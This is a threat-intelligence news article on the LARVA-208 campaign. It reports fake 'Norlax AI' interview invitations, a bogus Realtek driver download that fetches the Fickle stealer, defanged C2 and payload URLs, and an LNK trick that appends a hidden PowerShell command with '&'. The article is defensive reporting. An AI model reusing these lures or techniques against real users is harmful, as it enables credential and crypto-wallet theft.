LARVA-208: New Web3 Phishing Campaign Leverages Fake AI Platforms & Job Lures to Steal Crypto
Ddos 
A recent investigation by cybersecurity firm PRODAFT has uncovered a targeted and cunning phishing campaign by the threat group LARVA-208, which is now honing in on Web3 developers by weaponizing job applications, social engineering, and fake AI platforms. This campaign is an evolution of their previous schemes aimed at English-speaking IT staff—and it’s far more deceptive than before.
“LARVA-208 used multiple domains to contact IT employees, gather their VPN credentials, and subsequently harvest usernames and passwords from victims,” the report explains. Now, that same tactic is being applied to blockchain developers under a new guise.
At the center of this new campaign is “Norlax AI,” a fraudulent AI workspace platform designed to mimic the legitimate Teampilot.ai. The attackers distribute fake interview invitations to Web3 developers, often through X (formerly Twitter), Telegram, or remote job boards like Remote3. These invites link to Norlax.ai, where victims are asked to join a meeting under the pretense of a job interview or portfolio review.
“When victims click on meeting links within these deceptive AI Workspace projects… they encounter an error message falsely claiming their audio drivers are outdated or missing,” the report explains.
This tactic plays on trust—especially among candidates accustomed to virtual interviews on emerging platforms.
Once inside the Norlax AI platform, users receive a fake error prompt indicating their Realtek HD Audio Driver is missing. If the victim clicks the link, they are redirected to audiorealtek[.]com, where they unknowingly download malware.
This malware executes an embedded PowerShell command to retrieve and execute the Fickle stealer from LARVA-208’s C2 servers.
The Fickle stealer is a familiar tool in LARVA-208’s arsenal, capable of siphoning:
- System details (OS, hardware, language settings)
- Geolocation and IP address
- Installed programs and running processes
- Crypto wallet data and development environment credentials
Earlier iterations of the campaign used .LNK shortcut files that appeared benign but actually executed malicious PowerShell scripts.
“This shortcut appeared to call manage-bde.wsf… but used the ampersand (&) operator to append and execute a hidden PowerShell command,” the report states.
The command downloaded Fickle malware from URLs like bitacid[.]net/payload/callback.ps1. In recent operations, attackers have also shifted toward file sharing platforms like Filebin to host payloads and notify.php scripts to exfiltrate victim metadata.
The backend of the campaign is powered by a custom-built infrastructure called SilentPrism, which stores the exfiltrated data and logs from infected machines.
“In most cases… the information collected from victim devices is uploaded directly to the C2 servers used by the actor, which they have named SilentPrism,” the report reveals.
This infrastructure has been linked to Luminous Mantis, another known cybercrime group with ties to bulletproof hosting providers.
LARVA-208 is using novel delivery mechanisms but relying on well-established malware and social engineering tactics. Their ability to blend fake AI services, remote interviews, and realistic meeting platforms makes this campaign particularly dangerous for Web3 developers, whose access to crypto wallets and sensitive repositories presents a goldmine for attackers.
“This latest operation suggests a shift toward alternative monetization strategies, including the exfiltration of valuable data and credentials for potential resale or exploitation in illicit markets,” PRODAFT warns.
Related Posts:
- EncryptHub Exposed: 600+ Targets Hit by LARVA-208
- Fickle Stealer: The New Rust-Based Malware Masquerading as GitHub Desktop
- Fickle Stealer: A Rust-Based Stealer with Evolving Attack Chains and Flexible Targeting
- Crypto Tax Scam Sweeps Europe: Fake Government Sites Drain Wallets Via Seed Phrase Theft & Malicious Web3
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
